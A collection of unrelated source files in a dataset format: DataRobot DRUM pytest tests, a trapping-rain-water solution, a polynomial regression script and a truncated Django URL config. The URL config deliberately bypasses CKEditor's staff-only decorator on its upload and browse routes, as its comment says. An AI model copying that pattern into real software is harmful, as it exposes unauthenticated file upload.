cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n\n stdo_stde = str(stdo) + str(stde)\n\n if framework == SKLEARN:\n assert (\n str(stdo_stde).find(\n \"Wrong class labels. Use class labels detected by sklearn model\"\n )\n != -1\n )\n elif framework == RDS:\n assert (\n str(stdo_stde).find(\n \"Wrong class labels. 
Use class labels according to your dataset\"\n )\n != -1\n )\n\n # testing negative cases: no artifact, no custom;\n @pytest.mark.parametrize(\n \"framework, problem, language\",\n [\n (None, REGRESSION, NO_CUSTOM), # no artifact, no custom\n (SKLEARN, REGRESSION, R), # python artifact, custom.R\n (RDS, REGRESSION, PYTHON), # R artifact, custom.py\n (None, REGRESSION, R), # no artifact, custom.R without load_model\n (None, REGRESSION, PYTHON), # no artifact, custom.py without load_model\n ],\n )\n def test_detect_language(self, framework, problem, language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n cmd = \"{} score --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n if problem == BINARY:\n cmd = cmd + \" --positive-class-label yes --negative-class-label no\"\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n\n stdo_stde = str(stdo) + str(stde)\n\n cases_1_2_3 = (\n str(stdo_stde).find(\"Can not detect language by artifacts and/or custom.py/R files\")\n != -1\n )\n case_4 = (\n str(stdo_stde).find(\n \"Could not find a serialized model artifact with .rds extension, supported by default R predictor. \"\n \"If your artifact is not supported by default predictor, implement custom.load_model hook.\"\n )\n != -1\n )\n case_5 = (\n str(stdo_stde).find(\n \"Could not find model artifact file in: {} supported by default predictors\".format(\n custom_model_dir\n )\n )\n != -1\n )\n assert any([cases_1_2_3, case_4, case_5])\n\n # testing negative cases: no artifact, no custom;\n @pytest.mark.parametrize(\n \"framework, problem, language, set_language\",\n [\n (SKLEARN, REGRESSION_INFERENCE, R, \"python\"), # python artifact, custom.R\n (RDS, REGRESSION, PYTHON, \"r\"), # R artifact, custom.py\n (CODEGEN, REGRESSION, PYTHON, \"java\"), # java artifact, custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n \"java\",\n ), # java and sklearn artifacts, no custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n \"python\",\n ), # java and sklearn artifacts, no custom.py\n # Negative cases\n (SKLEARN, REGRESSION_INFERENCE, R, None), # python artifact, custom.R\n (RDS, REGRESSION, PYTHON, None), # R artifact, custom.py\n (CODEGEN, REGRESSION, PYTHON, None), # java artifact, custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n None,\n ), # java and sklearn artifacts, no custom.py\n (\n CODEGEN_AND_SKLEARN,\n REGRESSION,\n NO_CUSTOM,\n \"r\",\n ), # java and sklearn artifacts, no custom.py\n ],\n )\n def test_set_language(self, framework, problem, language, set_language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n input_dataset = self._get_dataset_filename(framework, problem)\n cmd = \"{} score --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n if set_language:\n cmd += \" --language {}\".format(set_language)\n if problem == BINARY:\n cmd += \" --positive-class-label yes --negative-class-label no\"\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! 
{}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n if not set_language:\n stdo_stde = str(stdo) + str(stde)\n cases_4_5_6_7 = (\n str(stdo_stde).find(\"Can not detect language by artifacts and/or custom.py/R files\")\n != -1\n )\n assert cases_4_5_6_7\n if framework == CODEGEN_AND_SKLEARN and set_language == \"r\":\n stdo_stde = str(stdo) + str(stde)\n case = (\n str(stdo_stde).find(\n \"Could not find a serialized model artifact with .rds extension, supported by default R predictor. \"\n \"If your artifact is not supported by default predictor, implement custom.load_model hook.\"\n )\n != -1\n )\n assert case\n\n @pytest.mark.parametrize(\n \"framework, language\", [(SKLEARN, PYTHON_ALL_HOOKS), (RDS, R_ALL_HOOKS)]\n )\n def test_custom_model_with_all_predict_hooks(self, framework, language, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, REGRESSION, language)\n\n input_dataset = self._get_dataset_filename(framework, REGRESSION)\n\n output = tmp_path / \"output\"\n\n cmd = \"{} score --code-dir {} --input {} --output {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset, output\n )\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n preds = pd.read_csv(output)\n assert all(\n val for val in (preds[\"Predictions\"] == len(CustomHooks.ALL_PREDICT)).values\n ), preds\n\n @staticmethod\n def run_server_thread(cmd, process_obj_holder):\n TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n process_obj_holder=process_obj_holder,\n )\n\n @staticmethod\n def wait_for_server(url, timeout, process_holder):\n # waiting for ping to succeed\n while True:\n try:\n response = requests.get(url)\n if response.ok:\n break\n except Exception:\n pass\n\n time.sleep(1)\n timeout -= 1\n if timeout <= 0:\n if process_holder is not None:\n print(\"Killing subprocess: {}\".format(process_holder.process.pid))\n os.killpg(os.getpgid(process_holder.process.pid), signal.SIGTERM)\n time.sleep(0.25)\n os.killpg(os.getpgid(process_holder.process.pid), signal.SIGKILL)\n\n assert timeout, \"Server failed to start: url: {}\".format(url)\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [\n (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),\n (SKLEARN, BINARY, PYTHON, None),\n (KERAS, REGRESSION, PYTHON, None),\n (KERAS, BINARY, PYTHON, None),\n (XGB, REGRESSION, PYTHON, None),\n (XGB, BINARY, PYTHON, None),\n (PYTORCH, REGRESSION, PYTHON, None),\n (PYTORCH, BINARY, PYTHON, None),\n (RDS, REGRESSION, R, None),\n (RDS, BINARY, R, None),\n (CODEGEN, REGRESSION, NO_CUSTOM, None),\n (CODEGEN, BINARY, NO_CUSTOM, None),\n (MOJO, REGRESSION, NO_CUSTOM, None),\n (MOJO, BINARY, NO_CUSTOM, None),\n (POJO, REGRESSION, NO_CUSTOM, None),\n (POJO, BINARY, NO_CUSTOM, None),\n (MULTI_ARTIFACT, REGRESSION, PYTHON_LOAD_MODEL, None),\n (PYPMML, REGRESSION, NO_CUSTOM, None),\n (PYPMML, BINARY, NO_CUSTOM, None),\n ],\n )\n def test_custom_models_with_drum_prediction_server(\n self, framework, problem, language, docker, tmp_path\n ):\n custom_model_dir = tmp_path / \"custom_model\"\n TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n with DrumServerRun(framework, problem, custom_model_dir, docker) as run:\n input_dataset = self._get_dataset_filename(framework, problem)\n\n # do predictions\n response 
= requests.post(\n run.url_server_address + \"/predict/\", files={\"X\": open(input_dataset)}\n )\n\n print(response.text)\n assert response.ok\n actual_num_predictions = len(json.loads(response.text)[RESPONSE_PREDICTIONS_KEY])\n in_data = pd.read_csv(input_dataset)\n assert in_data.shape[0] == actual_num_predictions\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [(SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN), (SKLEARN, BINARY, PYTHON, None)],\n )\n def test_custom_models_drum_prediction_server_response(\n self, framework, problem, language, docker, tmp_path\n ):\n custom_model_dir = tmp_path / \"custom_model\"\n TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n with DrumServerRun(framework, problem, custom_model_dir, docker) as run:\n input_dataset = self._get_dataset_filename(framework, problem)\n\n # do predictions\n response = requests.post(\n run.url_server_address + \"/predict/\", files={\"X\": open(input_dataset)}\n )\n\n assert response.ok\n response_json = json.loads(response.text)\n assert isinstance(response_json, dict)\n assert RESPONSE_PREDICTIONS_KEY in response_json\n predictions_list = response_json[RESPONSE_PREDICTIONS_KEY]\n assert isinstance(predictions_list, list)\n assert len(predictions_list)\n prediction_item = predictions_list[0]\n if problem == BINARY:\n assert isinstance(prediction_item, dict)\n assert len(prediction_item) == 2\n assert all([isinstance(x, str) for x in prediction_item.keys()])\n assert all([isinstance(x, float) for x in prediction_item.values()])\n elif problem == REGRESSION:\n assert isinstance(prediction_item, float)\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [(SKLEARN, BINARY, PYTHON, None), (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN)],\n )\n def test_custom_models_perf_test(self, framework, problem, language, docker, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n cmd = \"{} perf-test -i 10 -s 1000 --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {}\".format(docker)\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! {}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n\n @pytest.mark.parametrize(\n \"framework, problem, language, docker\",\n [\n (SKLEARN, BINARY, PYTHON, None),\n (SKLEARN, REGRESSION, PYTHON, DOCKER_PYTHON_SKLEARN),\n (SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, None),\n (SKLEARN, REGRESSION_INFERENCE, NO_CUSTOM, DOCKER_PYTHON_SKLEARN),\n ],\n )\n def test_custom_models_validation_test(self, framework, problem, language, docker, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n cmd = \"{} validation --code-dir {} --input {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, input_dataset\n )\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {}\".format(docker)\n\n p, stdo, stde = TestCMRunner._exec_shell_cmd(\n cmd,\n \"Failed in {} command line! 
{}\".format(ArgumentsOptions.MAIN_COMMAND, cmd),\n assert_if_fail=False,\n )\n\n if language == NO_CUSTOM:\n assert re.search(r\"Null value imputation\\s+FAILED\", stdo)\n else:\n assert re.search(r\"Null value imputation\\s+PASSED\", stdo)\n\n @pytest.mark.parametrize(\"language, language_suffix\", [(\"python\", \".py\"), (\"r\", \".R\")])\n def test_template_creation(self, language, language_suffix, tmp_path):\n print(\"Running template creation tests: {}\".format(language))\n directory = tmp_path / \"template_test_{}\".format(uuid4())\n\n cmd = \"{drum_prog} new model --language {language} --code-dir {directory}\".format(\n drum_prog=ArgumentsOptions.MAIN_COMMAND, language=language, directory=directory\n )\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed creating a template for custom model, cmd={}\".format(cmd)\n )\n\n assert os.path.isdir(directory), \"Directory {} does not exists (or not a dir)\".format(\n directory\n )\n\n assert os.path.isfile(os.path.join(directory, \"README.md\"))\n custom_file = os.path.join(directory, CUSTOM_FILE_NAME + language_suffix)\n assert os.path.isfile(custom_file)\n\n @staticmethod\n def _add_weights_cmd(weights, input_csv):\n df = pd.read_csv(input_csv)\n colname = \"some-colname\"\n weights_data = pd.Series(np.random.randint(1, 3, len(df)))\n __keep_this_around = NamedTemporaryFile(\"w\")\n if weights == WEIGHTS_ARGS:\n df[colname] = weights_data\n df.to_csv(__keep_this_around.name)\n return \" --row-weights \" + colname, __keep_this_around.name, __keep_this_around\n elif weights == WEIGHTS_CSV:\n weights_data.to_csv(__keep_this_around.name)\n return \" --row-weights-csv \" + __keep_this_around.name, input_csv, __keep_this_around\n\n return \"\", input_csv, __keep_this_around\n\n @pytest.mark.parametrize(\"framework\", [RDS, SKLEARN, XGB, KERAS, PYTORCH])\n @pytest.mark.parametrize(\"problem\", [BINARY, REGRESSION])\n @pytest.mark.parametrize(\"docker\", [DOCKER_PYTHON_SKLEARN, None])\n @pytest.mark.parametrize(\"weights\", [WEIGHTS_CSV, WEIGHTS_ARGS, None])\n @pytest.mark.parametrize(\"use_output\", [True, False])\n @pytest.mark.parametrize(\"nested\", [True, False])\n def test_fit(self, framework, problem, docker, weights, use_output, tmp_path, nested):\n if docker and framework != SKLEARN:\n return\n if framework == RDS:\n language = R_FIT\n else:\n language = PYTHON\n\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(\n custom_model_dir,\n framework,\n problem,\n language,\n is_training=True,\n nested=nested if language == PYTHON else False, # TODO: support nested R files\n )\n\n input_dataset = self._get_dataset_filename(framework, problem)\n\n weights_cmd, input_dataset, __keep_this_around = self._add_weights_cmd(\n weights, input_dataset\n )\n\n output = tmp_path / \"output\"\n output.mkdir()\n\n cmd = \"{} fit --code-dir {} --target {} --input {} --verbose \".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[problem], input_dataset\n )\n if use_output:\n cmd += \" --output {}\".format(output)\n if problem == BINARY:\n cmd = self._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {} \".format(docker)\n\n cmd += weights_cmd\n\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! 
{}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n\n def _create_fit_input_data_dir(self, input_dir, problem, weights):\n input_dir.mkdir(parents=True, exist_ok=True)\n\n input_dataset = self._get_dataset_filename(None, problem)\n df = pd.read_csv(input_dataset)\n\n # Training data\n with open(os.path.join(input_dir, \"X.csv\"), \"w+\") as fp:\n feature_df = df.loc[:, df.columns != self.target[problem]]\n feature_df.to_csv(fp, index=False)\n\n # Target data\n with open(os.path.join(input_dir, \"y.csv\"), \"w+\") as fp:\n target_series = df[self.target[problem]]\n target_series.to_csv(fp, index=False, header=\"Target\")\n\n # Weights data\n if weights:\n df = pd.read_csv(input_dataset)\n weights_data = pd.Series(np.random.randint(1, 3, len(df)))\n with open(os.path.join(input_dir, \"weights.csv\"), \"w+\") as fp:\n weights_data.to_csv(fp, header=False)\n\n @pytest.mark.parametrize(\"framework\", [SKLEARN, XGB, KERAS])\n @pytest.mark.parametrize(\"problem\", [BINARY, REGRESSION])\n @pytest.mark.parametrize(\"language\", [PYTHON])\n @pytest.mark.parametrize(\"weights\", [WEIGHTS_CSV, None])\n def test_fit_sh(self, framework, problem, language, weights, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(\n custom_model_dir, framework, problem, language, is_training=True\n )\n\n env = os.environ\n fit_sh = os.path.join(\n self.tests_root_path,\n \"..\",\n \"public_dropin_environments/{}_{}/fit.sh\".format(language, framework),\n )\n\n input_dir = tmp_path / \"input_dir\"\n self._create_fit_input_data_dir(input_dir, problem, weights)\n\n output = tmp_path / \"output\"\n output.mkdir()\n\n env[\"CODEPATH\"] = str(custom_model_dir)\n env[\"INPUT_DIRECTORY\"] = str(input_dir)\n env[\"ARTIFACT_DIRECTORY\"] = str(output)\n\n if problem == BINARY:\n labels = self._get_class_labels(framework, problem)\n env[\"NEGATIVE_CLASS_LABEL\"] = labels[0]\n env[\"POSITIVE_CLASS_LABEL\"] = labels[1]\n else:\n if os.environ.get(\"NEGATIVE_CLASS_LABEL\"):\n del os.environ[\"NEGATIVE_CLASS_LABEL\"]\n del os.environ[\"POSITIVE_CLASS_LABEL\"]\n\n TestCMRunner._exec_shell_cmd(fit_sh, \"Failed cmd {}\".format(fit_sh), env=env)\n\n def test_fit_simple(self, tmp_path):\n custom_model_dir = tmp_path / \"custom_model\"\n self._create_custom_model_dir(\n custom_model_dir, SIMPLE, REGRESSION, PYTHON, is_training=True, nested=True\n )\n\n input_dataset = self._get_dataset_filename(SKLEARN, REGRESSION)\n\n output = tmp_path / \"output\"\n output.mkdir()\n\n cmd = \"{} fit --code-dir {} --target {} --input {} --verbose\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, self.target[REGRESSION], input_dataset,\n )\n TestCMRunner._exec_shell_cmd(\n cmd, \"Failed in {} command line! 
{}\".format(ArgumentsOptions.MAIN_COMMAND, cmd)\n )\n\n\nclass TestDrumRuntime:\n @classmethod\n def setup_class(cls):\n TestCMRunner.setup_class()\n\n Options = collections.namedtuple(\n \"Options\",\n \"with_error_server {} docker address verbose show_stacktrace\".format(\n CMRunnerArgsRegistry.SUBPARSER_DEST_KEYWORD\n ),\n defaults=[RunMode.SERVER, None, \"localhost\", False, True],\n )\n\n class StubDrumException(Exception):\n pass\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_no_exceptions(self, mock_run_error_server):\n with DrumRuntime():\n pass\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_no_options(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime():\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_initialization_succeeded(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False)\n runtime.initialization_succeeded = True\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_not_server_mode(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False, RunMode.SCORE)\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_not_server_mode(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False, RunMode.SERVER, \"path_to_image\")\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_no_with_error_server(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(False)\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_not_called()\n\n @mock.patch(\"datarobot_drum.drum.runtime.run_error_server\")\n def test_exception_with_error_server(self, mock_run_error_server):\n with pytest.raises(TestDrumRuntime.StubDrumException):\n with DrumRuntime() as runtime:\n runtime.options = TestDrumRuntime.Options(True)\n runtime.initialization_succeeded = False\n raise TestDrumRuntime.StubDrumException()\n\n mock_run_error_server.assert_called()\n\n @pytest.fixture(params=[REGRESSION, BINARY])\n def params(self, request, tmp_path):\n framework = SKLEARN\n language = PYTHON\n\n problem = request.param\n\n custom_model_dir = tmp_path / \"custom_model\"\n TestCMRunner._create_custom_model_dir(custom_model_dir, framework, problem, language)\n\n server_run_args = dict(\n framework=framework, problem=problem, custom_model_dir=custom_model_dir,\n )\n\n return framework, problem, custom_model_dir, server_run_args\n\n def assert_drum_server_run_failure(self, 
server_run_args, with_error_server, error_message):\n drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)\n\n if with_error_server:\n # assert that the error server is up and the message is propagated via the API\n with drum_server_run as run:\n # check /health/ route\n response = requests.get(run.url_server_address + \"/health/\")\n assert response.status_code == 513\n assert error_message in response.json()[\"message\"]\n\n # check /predict/ route\n response = requests.post(run.url_server_address + \"/predict/\")\n\n assert response.status_code == 513\n assert error_message in response.json()[\"message\"]\n else:\n # DrumServerRun tries to ping the server.\n # assert that the process is already dead when it's done.\n with pytest.raises(ProcessLookupError), drum_server_run:\n pass\n\n assert drum_server_run.process.returncode == 1\n assert error_message in drum_server_run.process.err_stream\n\n @pytest.mark.parametrize(\"with_error_server\", [False, True])\n def test_e2e_no_model_artifact(self, params, with_error_server):\n \"\"\"\n Verify that an error occurs on drum server initialization if no model artifact is found\n - if '--with-error-server' is not set, the drum server process will exit with an error\n - if '--with-error-server' is set, the 'error server' will still be started, and\n will be serving the initialization error\n \"\"\"\n _, _, custom_model_dir, server_run_args = params\n\n error_message = \"Could not find model artifact file\"\n\n # remove model artifact\n for item in os.listdir(custom_model_dir):\n if item.endswith(PythonArtifacts.PKL_EXTENSION):\n os.remove(os.path.join(custom_model_dir, item))\n\n self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)\n\n @pytest.mark.parametrize(\"with_error_server\", [False, True])\n def test_e2e_model_loading_fails(self, params, with_error_server):\n \"\"\"\n Verify that an error occurs on drum server initialization if the model cannot load properly\n - if '--with-error-server' is not set, the drum server process will exit with an error\n - if '--with-error-server' is set, the 'error server' will still be started, and\n will be serving the initialization error\n \"\"\"\n _, _, custom_model_dir, server_run_args = params\n\n error_message = (\n \"Could not find any framework to handle loaded model and a score hook is not provided\"\n )\n\n # make model artifact invalid by erasing its content\n for item in os.listdir(custom_model_dir):\n if item.endswith(PythonArtifacts.PKL_EXTENSION):\n with open(os.path.join(custom_model_dir, item), \"wb\") as f:\n f.write(pickle.dumps(\"invalid model content\"))\n\n self.assert_drum_server_run_failure(server_run_args, with_error_server, error_message)\n\n @pytest.mark.parametrize(\"with_error_server\", [False, True])\n def test_e2e_predict_fails(self, params, with_error_server):\n \"\"\"\n Verify that when the drum server is started, if an error occurs on the /predict/ route,\n the 'error server' is not started regardless of the '--with-error-server' flag.\n \"\"\"\n framework, problem, custom_model_dir, server_run_args = params\n\n # remove a module required during processing of /predict/ request\n os.remove(os.path.join(custom_model_dir, \"custom.py\"))\n\n drum_server_run = DrumServerRun(**server_run_args, with_error_server=with_error_server)\n\n with drum_server_run as run:\n input_dataset = TestCMRunner._get_dataset_filename(framework, problem)\n\n response = requests.post(\n run.url_server_address + \"/predict/\", files={\"X\": open(input_dataset)}\n )\n\n assert 
response.status_code == 500 # error occurs\n\n # assert that 'error server' is not started.\n # as 'error server' propagates errors with 513 status code,\n # assert that after the error occurred, the next request is not 513\n\n # check /health/ route\n response = requests.get(run.url_server_address + \"/health/\")\n assert response.status_code == 200\n\n # check /predict/ route\n response = requests.post(run.url_server_address + \"/predict/\")\n\n error_message = \"ERROR: Samples should be provided as a csv file under `X` key.\"\n assert response.status_code == 422\n assert response.json()[\"message\"] == error_message\n\n assert drum_server_run.process.returncode == 0\n","sub_path":"tests/drum/test_custom_model.py","file_name":"test_custom_model.py","file_ext":"py","file_size_in_byte":44523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"421467715","text":"from typing import List\n\n\nclass Solution:\n # Scan from left to right and right to left\n # to get the maximum height that height[i] could reach\n # by going left or right or itself\n # water at this block = min(left, right) - height\n # Time: O(n)\n # Space: O(n)\n def trap(self, height: List[int]) -> int:\n if not height:\n return 0\n\n length = len(height)\n left_max = [0] * length\n right_max = [0] * length\n\n left_max[0] = height[0]\n for i in range(1, length):\n left_max[i] = max(height[i], left_max[i - 1])\n\n right_max[length - 1] = height[length - 1]\n for i in range(length - 2, -1, -1):\n right_max[i] = max(height[i], right_max[i + 1])\n\n result = 0\n for i in range(1, length - 1):\n result += min(left_max[i], right_max[i]) - height[i]\n\n return result","sub_path":"Amazon/DP/Trapping Rain Water/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"241842431","text":"\nimport numpy as np\nimport fileinput\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn import cross_validation\nfrom sklearn.pipeline import Pipeline\n\n\ndef import_data():\n\n\tline_num = 0\n\tdata_row = 0\n\tfor line in fileinput.input():\n\t if line_num == 0:\n\t arg_num, train_row = line.split()\n\t arg_num, train_row = int(arg_num), int(train_row)\n\t X = np.zeros((train_row, arg_num))\n\t Y = np.zeros((train_row, 1))\n\t elif line_num <= train_row:\n\t spl = line.split()\n\t for i in range(arg_num):\n\t \tX[data_row, i] = float(spl[i])\n\t Y[data_row] = float(spl[i+1])\n\t data_row +=1\n\t if line_num == train_row+1:\n\t \ttest_row = int(line)\n\t \tX_test = np.zeros((test_row, arg_num))\n\t \trow = 0\n\t if line_num > train_row+1:\n\t \tspl = line.split()\n\t \tfor i in range(arg_num):\n\t \t\tX_test[row, i] = float(spl[i])\n\t \trow+=1\n\n\t line_num+=1\n\n\treturn X, Y, X_test\n\ndef main():\n\n\tX, Y, X_t = import_data()\n\n\tX_n = preprocessing.scale(X)\n\tX_t_n = preprocessing.scale(X_t)\n\n\tX_train, X_test, y_train, y_test = cross_validation.train_test_split(X_n, Y)\n\n\t# # Linear regression \n\t# alpha = np.arange(0.001, 2.0, 0.001, np.float)\n\n\t# best_alpha = 0\n\t# best_score = 0\n\n\t# for a in alpha:\n\t# \tclf = linear_model.Ridge (alpha = a)\n\t# \tclf.fit(X_train, y_train)\n\t# \tsc = clf.score(X_test, y_test)\n\t# \tif sc > best_score:\n\t# \t\tbest_alpha = a\n\t# \t\tbest_score = sc\n\n\t# print(\"best score for linear model : {0}\".format(best_score))\n\n\t# # Poly regression\n\t# best_score_poly = 0\n\t# best_deg = 0\n\t# deg = np.arange(1, 7, 1)\n\t# 
for i in deg:\n\t# \tmodel_poly = Pipeline([('poly', preprocessing.PolynomialFeatures(degree=i)), \n\t# \t\t\t\t\t('linear', linear_model.LinearRegression(fit_intercept=False))])\n\t# \tmodel_poly.fit(X_train, y_train)\n\t# \tsc = model_poly.score(X_test, y_test)\n\t# \tif sc > best_score:\n\t# \t\tbest_score_poly = sc\n\t# \t\tbest_deg = i\n\n\t# print(\"best score for poly model deg {0} : {1}\".format(best_deg, best_score_poly))\n\n\t# # Poly regression ridge\n\t# best_score_ridge = 0\n\t# best_deg_ridge = 0\n\t# best_ridge_alpha = 0\n\t# deg = np.arange(1, 7, 1)\n\t# alpha = np.arange(0.01, 7.0, 0.01, np.float)\n\t# for i in deg:\n\t# \tfor a in alpha:\n\t# \t\tmodel_poly = Pipeline([('poly', preprocessing.PolynomialFeatures(degree=i)), \n\t# \t\t\t\t\t\t('linear', linear_model.Ridge (alpha = a))])\n\t# \t\tmodel_poly.fit(X_train, y_train)\n\t# \t\tsc = model_poly.score(X_test, y_test)\n\t# \t\tif sc > best_score_ridge:\n\t# \t\t\tbest_score_ridge = sc\n\t# \t\t\tbest_deg_ridge = i\n\t# \t\t\tbest_ridge_alpha = a\n\n\t# print(\"best score for poly model ridge deg {0} alpha {1} : {2}\".format(best_deg_ridge, best_ridge_alpha, best_score_ridge))\n\n\tbest_deg_ridge = 3\n\tbest_ridge_alpha = 0.01\n\n\tmodel_poly = Pipeline([('poly', preprocessing.PolynomialFeatures(degree=best_deg_ridge)), \n\t\t\t\t\t\t\t('linear', linear_model.Ridge (alpha = best_ridge_alpha))])\n\tmodel_poly.fit(X_train, y_train)\n\n\tfor i in X_t_n:\n\t\tprint(model_poly.predict(i)[0][0])\n\nif __name__ == \"__main__\":\n main()","sub_path":"Poynomial Regression/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"34509044","text":"\"\"\"CourseProject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom . 
import views\nfrom django.urls import path, include\n\n\nfrom django.conf.urls import url\nfrom ckeditor_uploader import views as uploader_views \nfrom django.views.decorators.http import require_http_methods # Bypass the staff-only decorator\nfrom django.views.decorators.cache import never_cache # Serve uploaded images\n\n\n \nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path('', include('homepage.urls')),\n path('', include('course.urls')),\n\t\n # Module\n path('', include('userforum.urls')),\n path('', include('usercompetition.urls')),\n path('', include('userprojectshare.urls')),\n path('', include('usergame.urls')),\n path('', include('usernews.urls')),\n \n # Ckeditor\n url(r'^ckeditor/upload/', uploader_views.upload, name='ckeditor_upload'),\n url(r'^ckeditor/browse/',never_cache(uploader_views.browse), name='ckeditor_browse'),\n\n # Admin\n\t# AdminPage\n path('', include('adminpage.urls')),\n path('adminintroduction/', include('adminintroduction.urls')),\n path('adminheader/', include('adminheader.urls')),\n path('adminfooter/', include('adminfooter.urls')),\n path('adminhome/', include('adminhome.urls')),\n path('adminsliderunbar/', include('adminsliderunbar.urls')),\n path('adminaccounttype/', include('adminaccounttype.urls')),\n path('adminaccount/', include('adminaccount.urls')),\n path('adminuserdetail/', include('adminuserdetail.urls')),\n path('adminenviromentcate/', 